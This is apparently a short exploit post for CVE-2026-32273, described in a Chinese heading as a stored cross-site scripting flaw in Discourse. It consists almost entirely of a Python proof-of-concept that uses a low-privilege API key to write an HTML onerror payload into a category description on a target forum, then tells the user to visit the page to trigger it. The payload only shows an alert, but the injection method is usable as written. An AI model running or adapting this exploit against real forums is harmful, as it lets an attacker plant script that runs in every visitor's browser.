CVE-2026-32273 Discourse存储型XSS漏洞

import requests # Exploit Title: Discourse Category Description XSS PoC # Description: Update category description via API with malicious payload. target_url = "https://target-discourse.com" api_key = "LOW_PRIVILEGE_API_KEY" api_username = "attacker" category_id = 1 # XSS Payload payload = "<img src=x onerror=alert('CVE-2026-32273')>" headers = { "Api-Key": api_key, "Api-Username": api_username, "Content-Type": "application/json" } # Endpoint to update category data = { "category": { "id": category_id, "description": payload } } response = requests.put(f"{target_url}/categories/{category_id}", headers=headers, json=data) if response.status_code == 200: print("[+] Payload injected successfully.") print("[+] Visit the category page to trigger XSS.") else: print(f"[-] Request failed: {response.text}")